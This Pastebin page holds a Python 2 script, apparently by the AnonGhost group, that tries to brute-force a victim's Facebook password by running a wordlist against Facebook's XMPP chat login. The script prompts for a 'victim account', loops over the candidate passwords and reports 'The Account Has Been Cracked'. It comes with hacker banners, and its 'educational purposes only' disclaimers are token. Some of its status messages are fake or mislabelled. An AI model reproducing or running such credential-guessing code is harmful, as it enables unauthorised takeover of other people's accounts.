talama

[+] Facebook XMPP Chat Protocol Bruteforce [+]

May 7th, 2017
135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.20 KB | None | 0 0
  1. #!/usr/bin/python
  2. #Install SleekXMPP & xmpppy Modules
  3. #Priv88888 and not for kidz -(18)
  4. #This program is only for educational purposes only.
  5. #Changing Description of this Script won't make you the coder ^_^ !
  6. #Don't Attack people facebook account's it's illegal !
  7. #If you want to HaCk into someone's account, you must have the permission of the user.
  8. #Mauritania Attacker is not responsible.
  9. #usage:script.py username then type wordlist file
  10.  
  11. import xmpp
  12. import sys
  13. import urllib,re
  14. import time
  15. import random
  16.  
  17. print """
  18.  
  19.  ______ ____         _____                _            
  20. |  ____|  _ \      / ____|              | |            
  21. | |__  | |_) |_____| |     _ __ __ _  ___| | _____ _ __
  22. |  __| |  _ <______| |    | '__/ _` |/ __| |/ / _ \ '__|
  23. | |    | |_) |     | |____| | | (_| | (__|   <  __/ |  
  24. |_|    |____/       \_____|_|  \__,_|\___|_|\_\___|_|  
  25.  
  26.         # Private Ghost Password Priv8
  27.         #We Still Da Kingz of Cyber Haterz \!/
  28.         # Coded By Mauritania Attacker & X-Wanted
  29.         # Greetz To All Members Of AnonGhost Team ;)
  30.         # Enjoy Cracking ^__^
  31.                #usage:script.py username then type wordlist file
  32.                                                        
  33.                                                    """    
  34.  
  35.  
  36.  
  37.  
  38. login = raw_input("Enter username of victim account : ")
  39.  
  40.  
  41. password_list   = open(sys.argv[1],"r")
  42.  
  43. login=login+"@chat.facebook.com"
  44.  
  45.  
  46. print "@Connecting To Facebook Terminal Server... "
  47. print "~~Connection Has Been Establishing Successfully To The Server~~"
  48. print "Negotiating With The Protocol..."
  49. print "There was no error with Port..."
  50. print "\!/ You Are Successfully Connected Enj0y \!/..."
  51. print "\!/ Attack Has Been Started Be Patient... \!/..."
  52.  
  53.  
  54. for pwd in password_list:
  55.  
  56.     sys.stdout.write(".")
  57.     sys.stdout.flush()
  58.  
  59.     pwd=pwd.strip('\n')
  60.  
  61.     jid = xmpp.protocol.JID(login)
  62.     cl  = xmpp.Client(jid.getDomain(), debug=[])
  63.  
  64.     if cl.connect(('chat.facebook.com',5222)):
  65.         print "~~Injecting Password~~"
  66.        
  67.     else:
  68.         print "[+]Successed[+]"
  69.  
  70.     print pwd
  71.  
  72.     if cl.auth(jid.getNode(), pwd):
  73.         cl.sendInitPresence()
  74.         print "The Account Has Been Cracked ^__^ "," Password Found ==> : ",pwd
  75.  
  76.     cl.disconnect()
  77.     time.sleep(2)
Add Comment
Please, Sign In to add comment